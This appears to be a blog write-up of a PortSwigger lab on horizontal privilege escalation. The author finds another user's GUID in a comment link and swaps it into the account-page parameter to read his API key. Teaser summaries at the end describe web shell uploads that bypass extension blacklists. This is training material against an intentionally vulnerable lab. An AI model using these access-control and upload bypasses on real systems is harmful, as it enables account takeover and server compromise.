On this page
User ID Controlled by Request Parameter, with Unpredictable User IDs
Lab
User ID controlled by request parameter, with unpredictable user IDs · Apprentice
Solution
Given
This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs.
To solve the lab, find the GUID for carlos, then submit his API key as the solution.
You can log in to your own account using the following credentials: wiener:peter
Analyzing the task
The lab is very similar to the previous one, except that we need to find the GUID of the target user on the site.
Recon
Log in as our user, look at the requests. The API key is here.
Walk around the site, see the list of posts, open the first one. Oh, carlos left a comment, his name is a link — click it:
GET /blogs?userId=2481e38a-2dba-4f3b-a2a1-433c37c9ce03
We got the target user's id. Now we can send a request to get the user's info, but with carlos's id substituted. Okay, send the request:
GET /my-account?id=2481e38a-2dba-4f3b-a2a1-433c37c9ce03
The response contains:
<div>Your API Key is: uqyLbJbk1E14YlHvsWrB2jHaL3C3lvQd</div>
Lab solved!
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.